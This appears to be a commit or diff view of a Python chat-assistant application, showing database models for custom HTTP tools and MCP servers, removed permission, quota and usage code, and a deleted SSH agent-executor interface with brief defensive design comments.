second screen. What differs is what sits between the row and the model: a
custom tool *is* one call, described here in full, while an MCP server is a
conversation whose tools are discovered and cached.
"""
from __future__ import annotations
from datetime import datetime
from typing import TYPE_CHECKING, Any
from sqlalchemy import Boolean, Column, DateTime, ForeignKey, Integer, String, Table, Text
from sqlalchemy.orm import Mapped, mapped_column, relationship
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
from lembas.db.types import JSONDict, JSONList
if TYPE_CHECKING:
# Annotation only; SQLAlchemy resolves the real class from its registry.
from lembas.db.models.user import Group
# How a row's secret is attached to a request. Stored values, so these are
# schema rather than presentation.
SECRET_NONE = "none"
SECRET_BEARER = "bearer"
SECRET_HEADER = "header"
SECRET_QUERY = "query"
SECRET_PLACEMENTS = (SECRET_NONE, SECRET_BEARER, SECRET_HEADER, SECRET_QUERY)
# How a response becomes text for the model.
RESPONSE_TEXT = "text" # prose; HTML reduced by fetch.html_to_text
RESPONSE_JSON = "json" # parsed, narrowed by response_path, pretty-printed
RESPONSE_RAW = "raw" # verbatim, truncated -- CSV, plain logs
RESPONSE_MODES = (RESPONSE_TEXT, RESPONSE_JSON, RESPONSE_RAW)
custom_tool_groups = Table(
"custom_tool_groups",
Base.metadata,
Column(
"tool_id", String(32), ForeignKey("custom_tools.id", ondelete="CASCADE"), primary_key=True
),
Column("group_id", String(32), ForeignKey("groups.id", ondelete="CASCADE"), primary_key=True),
)
mcp_server_groups = Table(
"mcp_server_groups",
Base.metadata,
Column(
"server_id", String(32), ForeignKey("mcp_servers.id", ondelete="CASCADE"), primary_key=True
),
Column("group_id", String(32), ForeignKey("groups.id", ondelete="CASCADE"), primary_key=True),
)
class CustomTool(UUIDPrimaryKey, Timestamps, Base):
"""One HTTP call, described well enough for a model to decide to make it."""
__tablename__ = "custom_tools"
# `slug` IS the function name sent to the endpoint, so it is bound by the
# charset those accept and is fixed once the row exists: it is also half of
# this tool's prompt-fragment key. `name` is the human label, shown in the
# admin list and in the transcript.
slug: Mapped[str] = mapped_column(String(64), unique=True, nullable=False)
name: Mapped[str] = mapped_column(String(120), nullable=False)
# Sent verbatim in the tools array. The only thing the model has to decide
# with, which is why the form insists on it.
description: Mapped[str] = mapped_column(Text, default="")
parameters_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# The *default* text of this tool's harness fragment. An administrator's
# edit on /admin/prompts is an override stored in the settings group like
# any other, so a tool deleted and recreated under the same slug keeps the
# wording somebody chose for it.
guidance: Mapped[str] = mapped_column(Text, default="")
method: Mapped[str] = mapped_column(String(8), default="GET", nullable=False)
# {{name}} placeholders, filled from the call's arguments. The scheme and
# the host must be literal -- see services/custom_tools.py for why.
url_template: Mapped[str] = mapped_column(String(1000), nullable=False)
body_template: Mapped[str] = mapped_column(Text, default="")
headers_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
secret_encrypted: Mapped[str] = mapped_column(Text, default="")
secret_placement: Mapped[str] = mapped_column(
String(16), default=SECRET_BEARER, nullable=False
)
secret_name: Mapped[str] = mapped_column(String(120), default="Authorization")
response_mode: Mapped[str] = mapped_column(String(16), default=RESPONSE_TEXT, nullable=False)
# A dotted path into a JSON response: "data.items.0.title". Empty is the
# whole document. Not JSONPath -- that is a dependency and a syntax nobody
# would remember for the one field they want.
response_path: Mapped[str] = mapped_column(String(300), default="")
max_chars: Mapped[int] = mapped_column(Integer, default=8000, nullable=False)
timeout: Mapped[int] = mapped_column(Integer, default=20, nullable=False)
# Whether this row may reach loopback, private or link-local addresses. Per
# row rather than the instance-wide search setting: an administrator naming
# http://127.0.0.1:11434 by hand is not the same act as a model handing the
# fetcher a URL it read on a page.
allow_private: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
public: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
position: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
last_checked_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
last_error: Mapped[str] = mapped_column(Text, default="")
groups: Mapped[list[Group]] = relationship(
"Group", secondary=custom_tool_groups, back_populates="custom_tools"
)
def __repr__(self) -> str:
return f"<CustomTool {self.slug}>"
class McpServer(UUIDPrimaryKey, Timestamps, Base):
"""A remote MCP server, reached over streamable HTTP.
The tools it advertises are cached in `tools_json` rather than given a table
of their own. A discovered tool carries exactly one administrator decision
-- offered or not, which `tool_overrides_json` holds -- while credentials,
guidance and access are all per server; and the whole list is replaced on
every refresh, so a table would mean reconciling rows against a cache of
somebody else's document.
"""
__tablename__ = "mcp_servers"
# Prefixed onto every tool name this server advertises, so that two servers
# both exposing "search" do not collide and neither shadows a built-in.
slug: Mapped[str] = mapped_column(String(24), unique=True, nullable=False)
name: Mapped[str] = mapped_column(String(120), nullable=False)
url: Mapped[str] = mapped_column(String(1000), nullable=False)
guidance: Mapped[str] = mapped_column(Text, default="")
secret_encrypted: Mapped[str] = mapped_column(Text, default="")
secret_placement: Mapped[str] = mapped_column(
String(16), default=SECRET_BEARER, nullable=False
)
secret_name: Mapped[str] = mapped_column(String(120), default="Authorization")
headers_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
timeout: Mapped[int] = mapped_column(Integer, default=30, nullable=False)
max_chars: Mapped[int] = mapped_column(Integer, default=8000, nullable=False)
allow_private: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
# The last tools/list, cached. One entry per tool:
# {"name", "offer_name", "description", "schema"}.
tools_json: Mapped[list[Any]] = mapped_column(JSONList, default=list)
# Per-tool switch, keyed by the server's own name for it. Absent means on,
# the same rule the model capability flags follow, so a newly advertised
# tool works rather than silently doing nothing.
tool_overrides_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# What the server answered at initialize, for the admin list.
protocol_version: Mapped[str] = mapped_column(String(32), default="")
server_info: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
public: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
position: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
last_checked_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
last_error: Mapped[str] = mapped_column(Text, default="")
groups: Mapped[list[Group]] = relationship(
"Group", secondary=mcp_server_groups, back_populates="mcp_servers"
)
def __repr__(self) -> str:
return f"<McpServer {self.slug}>"
+1 -113
View File
@@ -5,18 +5,7 @@ from __future__ import annotations
from datetime import datetime
from typing import TYPE_CHECKING, Any
from sqlalchemy import (
Boolean,
Column,
DateTime,
ForeignKey,
Index,
Integer,
String,
Table,
Text,
UniqueConstraint,
)
from sqlalchemy import Boolean, Column, DateTime, ForeignKey, Index, String, Table, Text
from sqlalchemy.orm import Mapped, mapped_column, relationship
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
@@ -25,7 +14,6 @@ from lembas.db.types import JSONDict
if TYPE_CHECKING:
# Annotation only; SQLAlchemy resolves the real class from its registry.
from lembas.db.models.connection import Model
from lembas.db.models.tool import CustomTool, McpServer
# Roles are a simple ordered ladder rather than a permission matrix. Groups
# (below) carry finer-grained permissions once the users/groups UI lands.
@@ -80,26 +68,10 @@ class Group(UUIDPrimaryKey, Timestamps, Base):
# lembas.security.permissions.
permissions_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
# What members of this group may spend. Resolved across a user's groups by
# **maximum**, which is the union rule applied to numbers: being in a second
# group can only ever grant more. Zero means "no limit" and therefore wins
# outright, because a group that says "unlimited" saying less than one that
# says "a million" would be the union rule inverted for one value.
#
# Absent keys mean the group has no opinion and contribute nothing. See
# security/permissions.py:limits_for.
limits_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
users: Mapped[list[User]] = relationship(secondary=user_groups, back_populates="groups")
models: Mapped[list[Model]] = relationship(
"Model", secondary="model_groups", back_populates="groups"
)
custom_tools: Mapped[list[CustomTool]] = relationship(
"CustomTool", secondary="custom_tool_groups", back_populates="groups"
)
mcp_servers: Mapped[list[McpServer]] = relationship(
"McpServer", secondary="mcp_server_groups", back_populates="groups"
)
class Session(UUIDPrimaryKey, Timestamps, Base):
@@ -126,87 +98,3 @@ class Session(UUIDPrimaryKey, Timestamps, Base):
Index("ix_sessions_user_id", Session.user_id)
class PushSubscription(UUIDPrimaryKey, Timestamps, Base):
"""One browser, on one device, that has agreed to be told.
Per device rather than per account, and that is not a detail: the permission
and the subscription both belong to a browser, so somebody signed in on a
laptop and a phone has two of these and revoking one must not silence the
other. It is also why there is no "notifications on" column on `User` -- the
presence of a row here *is* the state, and it cannot drift from what the
browser thinks.
`endpoint` is chosen by the browser vendor and is the address their push
service will accept a message at. Unique, because a browser that
re-subscribes hands back the same one and two rows would mean two
notifications for one arrival.
`p256dh` and `auth_secret` are the browser's half of the encryption. Stored
as the browser gave them, base64url: they are public key material and a
per-subscription salt, not credentials -- what they protect is the payload,
and a database holding them can already read everything the payload could
say. See services/push.py.
"""
__tablename__ = "push_subscriptions"
user_id: Mapped[str] = mapped_column(
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False
)
endpoint: Mapped[str] = mapped_column(Text, unique=True, nullable=False)
p256dh: Mapped[str] = mapped_column(String(255), nullable=False)
auth_secret: Mapped[str] = mapped_column(String(64), nullable=False)
# Which device this is, for a list somebody can revoke from. Whatever the
# browser says about itself, trimmed; never parsed.
label: Mapped[str] = mapped_column(String(200), default="")
# The last refusal from the push service, kept so a subscription that has
# stopped working says why rather than being silently useless. A 404 or 410
# deletes the row instead -- that is the end of its life, not a fault.
last_error: Mapped[str] = mapped_column(Text, default="")
user: Mapped[User] = relationship()
Index("ix_push_subscriptions_user_id", PushSubscription.user_id)
class Usage(UUIDPrimaryKey, Timestamps, Base):
"""What one account spent in one period.
A row per user per period rather than a row per reply. A per-reply ledger is
what somebody eventually wants for a bill; this exists to answer one
question on the request path -- "has this account used its month?" -- and
that question wants one indexed lookup, not a sum over ten thousand rows.
`period` is a plain "YYYY-MM" string in **UTC**. Not the reader's timezone:
a quota that resets at a different instant for each member of a group is a
quota nobody can reason about, and the month boundary is not something
anybody experiences to the hour.
Written by `generation._persist`, which is the single writer for everything
a reply produced, so a reply that is stopped or errors still records what it
spent -- an endpoint charges for tokens it generated whether or not the
reply was wanted.
"""
__tablename__ = "usage"
__table_args__ = (UniqueConstraint("user_id", "period", name="uq_usage_user_period"),)
user_id: Mapped[str] = mapped_column(
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
)
period: Mapped[str] = mapped_column(String(7), nullable=False)
prompt_tokens: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
completion_tokens: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
replies: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
# Counted separately because it is its own quota: one picture is a minute of
# somebody's GPU and no tokens at all, so a token budget says nothing about
# it. `images_today` on the resolved limits is the daily half; this is the
# month's running total, for the admin screen.
images: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
def __repr__(self) -> str:
return f"<Usage {self.user_id} {self.period}>"
+8 -107
View File
@@ -14,41 +14,24 @@ from starlette.exceptions import HTTPException as StarletteHTTPException
from lembas import __version__
from lembas.api import (
admin,
admin_agents,
admin_audio,
admin_branding,
admin_extraction,
admin_images,
admin_models,
admin_prompts,
admin_schedules,
admin_search,
admin_suggestions,
admin_tools,
admin_updates,
admin_users,
agents,
audio,
auth,
branding,
canvas,
chats,
files,
folders,
library,
messages,
pages,
preferences,
push,
reports,
schedules,
sharing,
terminal,
)
from lembas.api.deps import RedirectToLogin, is_htmx, login_redirect
from lembas.config import settings
from lembas.db.session import init_db
from lembas.services.library import indexing
from lembas.web.templating import STATIC_DIR, render
log = logging.getLogger("lembas")
@@ -83,7 +66,6 @@ async def lifespan(app: FastAPI) -> AsyncIterator[None]:
from lembas.services.chat import sweep_temporary
from lembas.services.files import sweep_orphans
from lembas.services.library.documents import sweep_unfiled
from lembas.services.library.indexing import sweep_orphans as sweep_chunks
from lembas.services.suggestions import seed_defaults as seed_suggestions
with session_scope() as db:
@@ -94,74 +76,20 @@ async def lifespan(app: FastAPI) -> AsyncIterator[None]:
# Temporary chats older than a day. Startup only, like the sweeps
# above it -- see services/chat.py:sweep_temporary.
sweep_temporary(db)
# Chunks whose record has gone. A backstop for a delete that
# happened with no event loop to schedule the tidy-up -- a CLI
# command, or a cascade from removing an account.
sweep_chunks(db)
# Three starting points on the empty screen, written once ever.
seed_suggestions(db)
except Exception: # noqa: BLE001 - housekeeping must never block startup
log.exception("orphaned upload sweep failed")
# Background jobs that were still running when we last stopped keep running
# on their own hosts; pick their watchers back up so the model is still
# woken when they finish. Best-effort, and inside the loop so its tasks land
# in this event loop.
try:
from lembas.services.agent.jobs import rehydrate as rehydrate_jobs
rehydrate_jobs()
except Exception: # noqa: BLE001 - a job that cannot be rehydrated is not fatal
log.exception("could not rehydrate background jobs")
# Schedules. `release_claims` first, because a firing interrupted by the
# last shutdown left a claim stamp that would otherwise read as permanently
# running. Then the ticker, started here rather than lazily like the
# terminal reaper: a schedule can be due at startup with nobody logged in,
# which is most of the point of having one. Inside the loop, so its tasks
# land in this event loop.
#
# Catching up on what was missed is deliberately NOT done here. It lives in
# the sweep, because a suspended laptop, a paused container and a long stall
# all reproduce "its time passed while nothing was running" with no restart
# for a startup hook to hang on.
try:
from lembas.services.schedule.ticker import release_claims
from lembas.services.schedule.ticker import start as start_ticker
released = release_claims()
if released:
log.info("released %s interrupted schedule claim(s)", released)
start_ticker()
except Exception: # noqa: BLE001 - scheduling failing must not block startup
log.exception("could not start the schedule ticker")
log.info("LLeMbas %s starting on http://%s:%s", __version__, settings.host, settings.port)
log.info("data directory: %s", settings.data_dir.resolve())
yield
# Replies still being written are cancelled and persisted with whatever
# they have, rather than left as permanently unfinished rows.
from lembas.services.agent.jobs import shutdown as stop_jobs
from lembas.services.agent.terminal import shutdown as stop_terminals
from lembas.services.generation import shutdown as stop_generations
from lembas.services.schedule.ticker import shutdown as stop_ticker
# Before the generations, so nothing new is fired into a chat whose reply is
# about to be cancelled and persisted.
await stop_ticker()
await stop_generations()
# Open shells have nothing to persist: whatever was running on the far side
# is cut off mid-command. Every deploy does this, and the panel is told why
# rather than left to guess -- see deploy/README.md.
await stop_terminals()
# Background jobs are the exception: cancelling a watcher does NOT stop the
# detached remote job, which keeps running and is rehydrated on the next
# start. Only the watching stops here.
await stop_jobs()
# A chunk set is written whole or not at all, so cancelling loses nothing
# a rebuild does not pick up again.
await indexing.shutdown()
log.info("LLeMbas stopped")
@@ -177,42 +105,21 @@ def create_app() -> FastAPI:
app.mount("/static", StaticFiles(directory=str(STATIC_DIR)), name="static")
# One place that notices a library record changing, rather than a call in
# each of the ten writers that touch those tables. Idempotent, because the
# factory is called per test. See services/library/indexing.py:install.
indexing.install()
app.include_router(pages.router)
app.include_router(auth.router)
app.include_router(preferences.router)
app.include_router(chats.router)
app.include_router(canvas.router)
app.include_router(terminal.router)
app.include_router(audio.router)
app.include_router(files.router)
app.include_router(folders.router)
app.include_router(library.router)
app.include_router(messages.router)
app.include_router(reports.router)
app.include_router(schedules.router)
app.include_router(agents.router)
app.include_router(sharing.router)
app.include_router(admin.router)
app.include_router(admin_users.router)
app.include_router(admin_updates.router)
app.include_router(admin_models.router)
app.include_router(admin_audio.router)
app.include_router(admin_branding.router)
app.include_router(admin_extraction.router)
app.include_router(admin_search.router)
app.include_router(admin_schedules.router)
app.include_router(admin_images.router)
app.include_router(admin_prompts.router)
app.include_router(admin_suggestions.router)
app.include_router(admin_tools.router)
app.include_router(admin_agents.router)
app.include_router(push.router)
app.include_router(branding.router)
register_error_handlers(app)
return app
@@ -243,7 +150,7 @@ def register_error_handlers(app: FastAPI) -> None:
{
"status_code": exc.status_code,
"detail": exc.detail,
"flavour": error_flavour(exc.status_code),
"flavour": ERROR_FLAVOUR.get(exc.status_code, ERROR_FLAVOUR[500]),
},
status_code=exc.status_code,
)
@@ -257,24 +164,18 @@ def register_error_handlers(app: FastAPI) -> None:
request,
"error.html",
{"status_code": 500, "detail": "Something went wrong.",
"flavour": error_flavour(500)},
"flavour": ERROR_FLAVOUR[500]},
status_code=500,
)
# Flavour lives in error pages, empty states and theme names -- never in the
# functional UI. See the working notes.
#
# The three lines themselves moved into `services/branding.py` with the rest of
# what an administrator can replace. What is left here is the mapping from a
# status code to which of them, which is not something anybody would want to
# edit. `snapshot()` never raises, so an error page can still render its error
# on an instance whose database is the thing that broke.
def error_flavour(status_code: int) -> str:
from lembas.services import branding
text = branding.snapshot().text
return text.get(f"error_{status_code}") or text["error_500"]
# functional UI. See CLAUDE.md.
ERROR_FLAVOUR = {
403: "Speak, friend, and enter. This door is not yours to open.",
404: "Not all those who wander are lost. This page, however, is.",
500: "The Road goes ever on, but this stretch of it has washed out.",
}
app = create_app()
+3 -291
View File
@@ -86,121 +86,6 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
True,
"Chat",
),
PermissionDef(
"tools.fetch",
"Fetch a page",
"Let a model retrieve one web page and read it, given its address. "
"Addresses on this machine and this network are refused unless an "
"administrator has allowed them.",
True,
"Chat",
),
PermissionDef(
"tools.image",
"Generate images",
"Let a model draw a picture and show it in the conversation. Only "
"offered when an image generator has been configured, and every "
"generation spends time on whatever machine is running it.",
True,
"Chat",
),
PermissionDef(
"tools.custom",
"Use custom tools",
"Let a model call the HTTP tools an administrator has defined. Which "
"ones depends on the groups each tool is restricted to.",
True,
"Chat",
),
PermissionDef(
"tools.mcp",
"Use MCP servers",
"Let a model call tools from the MCP servers an administrator has "
"added. Which ones depends on the groups each server is restricted to.",
True,
"Chat",
),
PermissionDef(
"agent.ssh",
"Save SSH connections",
"Keep connection profiles for machines of their own. The credential is "
"encrypted here, and whoever saves it decides which host it opens.",
False,
"Agent",
),
PermissionDef(
"tools.agent",
"Run commands",
"Let a model read files, write files and run commands on one of their "
"SSH connections. What it may do without asking depends on the chat's "
"mode. Nothing runs on this server.",
False,
"Agent",
),
PermissionDef(
"agent.terminal",
"Open a terminal",
"Open an interactive shell on one of their own SSH connections, from "
"inside the chat. What they type there is theirs: the chat's mode "
"governs the model, not the person at the keyboard.",
False,
"Agent",
),
PermissionDef(
"tools.subagent",
"Delegate to a helper",
"Let a model hand a self-contained piece of work to a second one that "
"runs on its own and reports back — reading and searching in parallel "
"rather than one thing at a time. A helper cannot ask questions, "
"cannot spawn helpers of its own, and can only do what this chat could "
"already do without stopping to ask.",
False,
"Chat",
),
PermissionDef(
"tools.ask",
"Be asked questions",
"Let a model stop mid-reply and ask you something, with answers to pick "
"from or a box to write your own.",
True,
"Chat",
),
PermissionDef(
"tools.scratch",
"Write in the canvas",
"Let a model build something up in this chat's scratch document, which "
"sits open beside the conversation and can be edited and attached to a "
"message. It belongs to the chat and is not searchable afterwards.",
True,
"Chat",
),
PermissionDef(
"schedule.use",
"Schedule work",
"Set things to run later, on their own — once, or on a repeating "
"timetable. This spends model time with nobody at the keyboard, so it "
"is a capability chosen on purpose rather than one everybody has.",
False,
"Scheduling",
),
PermissionDef(
"reports.use",
"Keep reports",
"Read the Reports section: finished pieces of work filed for them to "
"read later, by a model that was asked for one or by something that ran "
"while they were away.",
True,
"Reports",
),
PermissionDef(
"tools.report",
"File reports",
"Let a model write a report when it finishes a piece of work, and read "
"back ones it filed earlier. A report is addressed to the reader and "
"cannot be replied to, so this costs nothing but a place to put things.",
True,
"Reports",
),
PermissionDef(
"audio.transcribe",
"Dictate messages",
@@ -225,15 +110,9 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
PermissionDef(
"library.share",
"Share library items",
"Give other people, or a group, access to their knowledge bases, notes, "
"skills and reports. Sharing grants reading only — never changing, and "
"never sharing on.",
# On. It was off, which meant sharing shipped documented as done and
# unreachable: the panel is only rendered for somebody who holds this,
# so out of the box nobody could share anything and nothing said why.
# An instance that wants it off can say so; one that never looked should
# get the feature it was told it had.
True,
"Give other people, or a group, access to their documents, notes and "
"skills. Sharing grants reading only.",
False,
"Library",
),
PermissionDef(
@@ -266,53 +145,8 @@ PERMISSION_DEFS: tuple[PermissionDef, ...] = (
True,
"Library",
),
# --- Reading and writing, split where the difference matters ------------
# Three gates cover both, and for these three the two halves are genuinely
# different decisions: a model that may *read* somebody's notes and not add
# to them is a reasonable thing to want, and until now `tools.notes` was one
# switch over five tools.
#
# Not split for every gate. `tools.web_search` has no write half; `report`
# is a write with no read worth withholding; `agent` has modes, which are a
# finer instrument than a permission and are per chat. A permission that
# answers "the same as that one" is a permission nobody should be asked
# about -- the reasoning `schedule.use` already carries.
#
# **All three default on**, so an instance that never looks behaves exactly
# as it did: `_family_allowed` reads them only to *narrow* what the gate
# already allowed.
PermissionDef(
"tools.notes.write",
"Write notes",
"Let a model create, change and delete notes. Without it, it can still "
"search and read the ones that are there.",
True,
"Library",
),
PermissionDef(
"tools.memory.write",
"Record memories",
"Let a model add and forget short facts about this person. Without it, "
"the memories it already has are still shown to it every turn.",
True,
"Library",
),
PermissionDef(
"tools.skills.write",
"Write skills",
"Let a model write new skills and change existing ones. Without it, it "
"follows the skills that are there and cannot add to them — which is "
"the setting for an instance whose skills are curated by hand.",
True,
"Library",
),
)
# Gates whose read and write halves are separate permissions. Keyed on the gate,
# with the permission derived as `tools.<gate>.write`, so adding a fourth is one
# entry here and one PermissionDef above.
SPLIT_GATES = ("notes", "memory", "skills")
PERMISSION_KEYS = tuple(d.key for d in PERMISSION_DEFS)
DEFAULT_PERMISSIONS = {d.key: d.default for d in PERMISSION_DEFS}
@@ -355,128 +189,6 @@ def has(db: DBSession, user: User | None, key: str) -> bool:
return resolve(db, user).get(key, False)
def explain(db: DBSession, user: User | None) -> dict[str, dict]:
"""Every permission, whether this user has it, and **where it came from**.
The question the admin screens could not answer. `resolve` has always
computed the union and thrown the working away, so "why can this person do
X?" meant opening every group they belong to and reading the grids by eye --
which is exactly the simulation the union rule exists to avoid needing.
`source` is "admin" (bypassing everything), "baseline", or the names of the
groups that granted it. A permission that is off has no source, because
nothing granted it -- there is no such thing as a deny here to point at.
"""
keys = PERMISSION_KEYS
if user is None:
return {key: {"on": False, "source": []} for key in keys}
if user.is_admin:
return {key: {"on": True, "source": ["admin"]} for key in keys}
baseline = baseline_permissions(db)
out: dict[str, dict] = {}
for key in keys:
sources = ["baseline"] if baseline.get(key) else []
sources += [
group.name for group in user.groups if (group.permissions_json or {}).get(key)
]
out[key] = {"on": bool(sources), "source": sources}
return out
# --- Quotas -------------------------------------------------------------------
# What a group may raise, and what each number means. Every one of them is
# **zero for no limit**, which is the convention `max_completion_tokens` and
# `index_chars` already use here, and it is what makes "unlimited" sayable at all.
#
# Five axes rather than one, because they fail differently and a single "budget"
# would have to pick an exchange rate between a token and a minute of somebody's
# GPU. There isn't one.
LIMIT_DEFS: tuple[tuple[str, str, str], ...] = (
(
"monthly_tokens",
"Tokens a month",
"Prompt and completion together, across every chat, reset on the first "
"of the month. Reached, a reply says so before it spends anything "
"rather than stopping half way through.",
),
(
"concurrent_replies",
"Replies at once",
"How many of their chats may be writing at the same time. This is the "
"one that stops one person queueing every other person's work behind "
"them on a single endpoint.",
),
(
"agent_seconds",
"Longest agent reply",
"Seconds of wall clock for one reply in an agent chat, if lower than "
"the instance's own. Waiting for somebody to approve something does "
"not count.",
),
(
"images_per_day",
"Images a day",
"Each one is a minute of somebody's GPU and no tokens at all, so a "
"token budget says nothing about it.",
),
(
"helpers_per_reply",
"Helpers per reply",
"How many subagents one reply may send, if lower than the instance's "
"own.",
),
)
LIMIT_KEYS = tuple(key for key, _, _ in LIMIT_DEFS)
# Nobody is limited until somebody says so. A quota that arrived with an upgrade
# and started refusing replies would be the worst possible way to introduce one.
NO_LIMITS: dict[str, int] = dict.fromkeys(LIMIT_KEYS, 0)
def limits_for(db: DBSession, user: User | None) -> dict[str, int]:
"""What this user may spend, resolved across their groups.
**By maximum**, which is the union rule applied to numbers: being in a second
group can only ever grant more, never less. That is the same promise the
permissions make, and having one of the two work the other way round is how
"why can this person not do X" stops being answerable.
**Zero wins outright**, because zero means "no limit". Taking the plain
maximum would make a group saying "unlimited" count for less than one saying
"a million", which is the union rule inverted for exactly one value -- and it
is the value somebody sets when they mean *stop limiting this person*.
An administrator is unlimited, for the reason `resolve` gives them every
permission: they can raise their own quota in two clicks, and pretending
otherwise is theatre.
"""
if user is None or user.is_admin:
return dict(NO_LIMITS)
resolved = dict(NO_LIMITS)
for key in LIMIT_KEYS:
values = []
for group in user.groups:
raw = (group.limits_json or {}).get(key)
if raw is None:
continue # no opinion, contributes nothing
try:
values.append(max(0, int(raw)))
except (TypeError, ValueError):
continue
if not values or 0 in values:
resolved[key] = 0
else:
resolved[key] = max(values)
return resolved
def limit(db: DBSession, user: User | None, key: str) -> int:
return limits_for(db, user).get(key, 0)
def models_visible_to(db: DBSession, user: User | None) -> list[Model]:
"""Models a user may start a chat with, in display order.
-36
View File
@@ -1,36 +0,0 @@
"""Agentic execution: running commands and touching files on the model's behalf.
Four parts, and the split is the safety argument. `policy` decides what may
happen without asking and knows nothing about how anything runs. `base` is the
interface a target implements. `local` runs on this machine inside a bubblewrap
sandbox that cannot see the database or the encryption key; `ssh` runs on
somebody else's machine, where nothing is sandboxed and the credential is the
whole of the trust.
The mode is enforced in the generation loop, not in the prompt. A model is told
which mode it is in so it can behave sensibly, but being told is not what stops
it: everything it reads is untrusted, and a rule written only into a system
message is a rule a poisoned README can argue with.
"""
from lembas.services.agent.policy import (
MODE_AUTO,
MODE_EDIT,
MODE_MANUAL,
MODE_PLAN,
MODES,
Decision,
Limits,
decide,
)
__all__ = [
"MODES",
"MODE_AUTO",
"MODE_EDIT",
"MODE_MANUAL",
"MODE_PLAN",
"Decision",
"Limits",
"decide",
]
-196
View File
@@ -1,196 +0,0 @@
"""What an agent chat needs from the machine it acts on.
One interface, currently one implementation. It exists as an interface anyway
because the *snapshot* is the load-bearing part: a generation outlives the
request that started it, so everything a runner needs -- the host, the decrypted
credential, the mode, the project directory -- has to be read while the session
is open and carried, not looked up later. That is the same reason `Endpoint` is
a frozen copy of a `Connection` and `ToolContext` holds an owner id rather than
a `User`.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Any, Protocol
# What a command may weigh before it is cut off. Per call; the reply also has a
# total, in policy.Limits.
DEFAULT_MAX_BYTES = 64 * 1024
DEFAULT_TIMEOUT = 60.0
# Terminal escape sequences, stripped from anything a command produced. They are
# inert in escaped HTML, but this text also re-enters the model's context, where
# they are a known way of hiding instructions, and it may end up in a log a
# person later cats, where they hijack the terminal.
_ANSI = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)|\x1b[@-Z\\-_]")
@dataclass(frozen=True)
class ExecRequest:
"""One command to run."""
command: str
cwd: str = ""
timeout: float = DEFAULT_TIMEOUT
max_bytes: int = DEFAULT_MAX_BYTES
@dataclass(frozen=True)
class ExecResult:
"""What running it produced.
`output` is stdout and stderr interleaved, because a shell transcript is
what the model needs to read and separating them loses the ordering that
makes an error make sense.
"""
exit_status: int
output: str
truncated: bool = False
timed_out: bool = False
duration_ms: int = 0
@property
def ok(self) -> bool:
return self.exit_status == 0 and not self.timed_out
class ExecError(Exception):
"""Nothing could be run at all: the host refused, or the credential did.
Distinct from a command that ran and failed -- that is an `ExecResult` with
a non-zero status, which the model should read and react to. This is the
reply not being able to act, which is a message for a person.
"""
def __init__(self, message: str) -> None:
super().__init__(message)
self.message = message
@dataclass(frozen=True)
class Target:
"""A machine an agent chat acts on, read while the session was open.
Holds the decrypted credential and nothing else does. `generation` clears it
when the reply ends, because a finished `Generation` lingers for five
minutes so late followers get the final frames, and a private key should not
linger with it.
"""
kind: str
label: str
project_dir: str = ""
spec: dict[str, Any] = field(default_factory=dict)
@dataclass(frozen=True)
class RemoteEntry:
"""One line of a directory listing, with enough to draw it.
Separate from `list_dir`, which returns bare names and backs the
`file_list` tool. That contract is a list of names and must not change
under a model mid-conversation, so a picker -- which has to tell a
directory from a file before it knows whether the row can be walked into
-- gets its own method rather than a widened one.
"""
name: str
is_dir: bool
size: int = 0
modified: int = 0
@property
def is_hidden(self) -> bool:
return self.name.startswith(".")
@dataclass(frozen=True)
class RemoteFile:
"""A file as somebody is about to edit it, rather than as a model reads it.
Separate from what `read_file` returns for the same reason `RemoteEntry` is
separate from `list_dir`: the model-facing contract is right for a model and
wrong here. `read_file` runs its result through `clean_output`, which strips
escape sequences and decodes with errors="replace" -- so a file opened
through it and saved back would come out rewritten.
`binary` means there is nothing safe to put in a textarea, and the tab opens
read-only. `truncated` means the same for a different reason: saving back
the first 256KB of a larger file is how the rest of it is deleted.
"""
text: str
size: int = 0
mtime: int = 0
truncated: bool = False
binary: bool = False
@property
def revision(self) -> str:
return revision_of(self.mtime, self.size)
def revision_of(mtime: int, size: int) -> str:
"""An opaque token saying which version of a file was read.
Round-tripped through a hidden field and compared on the way back in. Not a
hash: hashing means reading the whole file again on every save, and this
catches the case it exists for -- somebody else's editor, a build, a
checkout -- without it.
"""
return f"{mtime}:{size}"
class Conflict(Exception):
"""The file moved between being opened and being saved.
Carries the revision found instead, so the card offering Overwrite has
something to compare against.
"""
def __init__(self, found: str = "") -> None:
super().__init__("That file changed after it was opened.")
self.found = found
class Executor(Protocol):
"""How a target is acted on. See `ssh.py`; there is no local variant."""
async def run(self, request: ExecRequest) -> ExecResult: ...
async def read_file(self, path: str, *, max_bytes: int) -> str: ...
async def write_file(self, path: str, text: str) -> int: ...
async def read_text(self, path: str, *, max_bytes: int) -> RemoteFile: ...
async def write_text(self, path: str, text: str, *, if_unchanged: str) -> RemoteFile: ...
